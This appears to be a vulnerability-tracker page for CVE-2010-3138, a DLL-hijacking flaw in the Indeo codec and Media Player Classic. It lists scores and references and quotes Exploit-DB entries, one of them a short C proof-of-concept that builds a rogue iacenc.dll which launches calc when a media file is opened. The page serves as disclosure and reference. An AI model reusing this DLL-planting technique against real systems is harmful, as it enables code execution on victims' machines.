CVE-2010-3138
published 2010-08-27CVE-2010-3138: Untrusted search path vulnerability in the Indeo Codec in iac25_32.ax in Microsoft Windows XP SP3 allows local users to gain privileges via a Trojan horse…
PriorityP353critical9.3CVSS 2.0
AVNACMAuNCCICAC
EXPLOIT
EPSS
26.69%
97.8th percentile
Untrusted search path vulnerability in the Indeo Codec in iac25_32.ax in Microsoft Windows XP SP3 allows local users to gain privileges via a Trojan horse iacenc.dll file in the current working directory, as demonstrated by access through BS.Player or Media Player Classic to a directory that contains a .avi, .mka, .ra, or .ram file, aka "Indeo Codec Insecure Library Loading Vulnerability." NOTE: some of these details are obtained from third party information.
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
No detection rules found.
Exploit-DB
Media Player Classic 1.3.2189.0 - 'iacenc.dll' DLL Hijacking
exploitdb·2010-08-25
CVE-2010-3138 Media Player Classic 1.3.2189.0 - 'iacenc.dll' DLL Hijacking
Media Player Classic 1.3.2189.0 - 'iacenc.dll' DLL Hijacking
---
/*
Mediaplayer Classic 1.3.2189.0 Dll Hijack Exploit
By: Encrypt3d.M!nd
Date: 25\8\2010
Download: http://mpc-hc.sourceforge.net/
Details:
Compile the following code and rename it to iacenc.dll
and place file with one of the affected types in the same directory of the dll
Affected types: m2ts, m2t, flv, hdmov, 3gpp,3gp, mpeg, mp4v, mkv, m2v,rm , ram
(i guess all file types that mpc supports are affected)
Code :(used the one from this advisory:http://www.exploit-db.com/exploits/14758/):
*/
#include
#define DLLIMPORT __declspec (dllexport)
DLLIMPORT void hook_startup() { evil(); }
int evil()
{
WinExec("calc", 0);
exit(0);
return 0;
}
// POC: https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploit
Exploit-DB
Media Player Classic 6.4.9.1 - 'iacenc.dll' DLL Hijacking
exploitdb·2010-08-25
CVE-2010-3138 Media Player Classic 6.4.9.1 - 'iacenc.dll' DLL Hijacking
Media Player Classic 6.4.9.1 - 'iacenc.dll' DLL Hijacking
---
/*
Media Player Classic 6.4.9.1 (iacenc.dll) DLL Hijacking Exploit
Vendor: Gabest
Product Web Page: http://sourceforge.net/projects/guliverkli
Affected Version: 6.4.9.1 (revision 73)
Summary: Media Player Classic (MPC) is a compact media player for
32-bit Microsoft Windows. The application mimics the look and feel
of the old, lightweight Windows Media Player 6.4 but integrates
most options and features found in modern media players. It and
its forks are standard media players in the K-Lite Codec Pack and
the Combined Community Codec Pack.
Desc: Media Player Classic suffers from a dll hijacking vulnerability
that enables the attacker to execute arbitrary code on a local
level. The vulnerable extensions are .mka, .ra and .ra
http://osvdb.org/67588http://secunia.com/advisories/41114http://www.exploit-db.com/exploits/14765http://www.exploit-db.com/exploits/14788http://www.us-cert.gov/cas/techalerts/TA12-045A.htmlhttp://www.vupen.com/english/advisories/2010/2190http://www.zeroscience.mk/en/vulnerabilities/ZSL-2010-4956.phphttps://docs.microsoft.com/en-us/security-updates/securitybulletins/2012/ms12-014https://oval.cisecurity.org/repository/search/definition/oval%3Aorg.mitre.oval%3Adef%3A7132http://osvdb.org/67588http://secunia.com/advisories/41114http://www.exploit-db.com/exploits/14765http://www.exploit-db.com/exploits/14788http://www.us-cert.gov/cas/techalerts/TA12-045A.htmlhttp://www.vupen.com/english/advisories/2010/2190http://www.zeroscience.mk/en/vulnerabilities/ZSL-2010-4956.phphttps://docs.microsoft.com/en-us/security-updates/securitybulletins/2012/ms12-014https://oval.cisecurity.org/repository/search/definition/oval%3Aorg.mitre.oval%3Adef%3A7132
2010-08-27
Published